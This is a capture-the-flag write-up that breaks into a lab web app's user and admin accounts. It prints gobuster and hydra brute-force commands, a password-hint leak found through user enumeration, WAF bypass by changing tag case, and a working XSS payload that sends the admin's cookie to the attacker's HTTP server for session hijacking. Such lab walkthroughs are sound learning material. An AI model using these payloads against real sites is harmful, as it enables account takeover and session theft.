None

Description:

The farewell server will be decommissioned in less than 24 hours. Everyone is asked to leave one last message, but the admin panel holds all submissions. Can you sneak into the admin area and read every farewell message before the lights go out?

Note: In case you want to start over or restart all services, visit http://<target>/status.php.

Answer the questions below

  • What is the flag value after logging in as a normal user?
  • What is the flag value after logging in as admin?

This room asks us to log in as a normal user and admin, so my first guess is that we can focus solely on the target web application.

Nmap scan:

None

Nothing fancy here, HTTP port 80 as expected, and SSH port 22 is also commonly open.

Webpage:

path enumeration with Gobuster

It timed out and blocked my connection after around 1000 requests, so it's either my poor connection to the box or it has rate limiting… or maybe both. Therefore, I added "-to 30s" to expand the waiting time (default 10 seconds)

gobuster dir -u http://<target ip>/ -w /usr/share/wordlists/dirb/common.txt -to 30s
None
  • /index.php — default login page
  • /admin.php — admin page
  • /info.php — full phpinfo() output
None
/admin.php

The admin page requires only a password. I tried to capture the request with Burp Suite and it sends a POST request to itself.

The site has a simple login page for normal users to leave farewell message.

None
None
/check.js

What's special about this login form is that it tells you if the user exists and also give a password hint. The hint can be captured with Burp Suite.

None
non-existing user
None
existing user

Apart from the admin user, there's a running banner on top of the default login page that shows a few active users.

adam posted a message - 3 hrs ago
deliver11 posted a message - 4 hrs ago
nora posted a message - 1 day ago

With that, I manually captured the hint for each user

admin      "password_hint":"the year plus a kind send-off"        , "last_password_change":"2025-10-31 19:03:00"
adam       "password_hint":"favorite pet + 2"                     , "last_password_change":"2025-10-21 09:12:00",
deliver11  "password_hint":"Capital of Japan followed by 4 digits", "last_password_change":"2025-09-10 11:00:00"
nora       "password_hint":"lucky number 789"                     , "last_password_change":"2025-08-01 13:45:00",

Adam's and Nora's passwords can be anything with these broad hints. That leaves me with admin and deliver11.

Brute forcing deliver11 password may seem easy but also annoying with WAF rate limiting. We may need to put an extensive delay or rotate IP addresses. For this reason, I aimed for the admin user.

Here's some script that might come in handy if you want to try different approaches:

# We can't be too aggressive but a small wordlist is fine.
hydra -l <user> -P <password_list> <target_ip> http-post-form "/auth.php:username=^USER^&password=^PASS^:F=auth_failed"

# If you want to try deliver11
for i in $(seq -w 0 9999); do
  echo "Tokyo$i"
done > Tokyoxxxx.txt

The admin password hint is "the year plus a kind send-off", and of course the farewell server will be decommissioned in less than 24 hours. The password likely includes "2025" and "farewell, bye, goodbye, etc."

After a few attempts, I got lucky and found password

"admin:Farewell2025!"

Although the account is named admin, this password doesn't work on /admin.php page. Of course that would be a big leap skipping normal user account login. (/admin.php checks the password with itself, while /index.php checks with /auth.php)

None

What is the flag value after logging in as a normal user? | Done

None

Any text submitted is surrounded with quotation marks when displayed, and these messages are approved after some time. So, I assumed there's a script reviewing the comment as an admin and our goal is to steal its admin cookie.

Things can never be easy because the WAF that has been haunting me since path enumeration. Now it blocks based on patterns like "<script>", "document.cookie", "<img src=x onerror=…>".

None

Even if we can put some scripts that aren't blocked by firewall, we have to ensure that the script that passes the filter actually gets executed.

I open a temporary HTTP server on attacker machine.

└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Then I use payloads from XSS (Cross Site Scripting) — HackTricks to find working script.

First, I tested whether blind XSS works.

None

This confirms that the server can connect back to the attacker machine. Next, I attempted few payloads to find what's blocked by the WAF.

Like "<img src=x onerror=" is blocked but "<ImG src=x onerror=" works just fine. It's also worth mentioning here that we can't get too fancy with our payload because the input length is limited to 100 characters and it will return "Maximum 100 characters allowed." There might be a way around, but I didn't bother to find it.

After a few attempts and box resets, I got this working payload:

<ImG src=x onerror=this.src="http://<ip>/?c="+document["co"+"okie"]>
None

Replace our session ID with the brand new one we just got.

None

And now we can truly access /admin.php where the final flag awaits.

None
/admin.php

What is the flag value after logging in as admin? | Done

Enjoy Bidding Farewell! ( — — ;)

None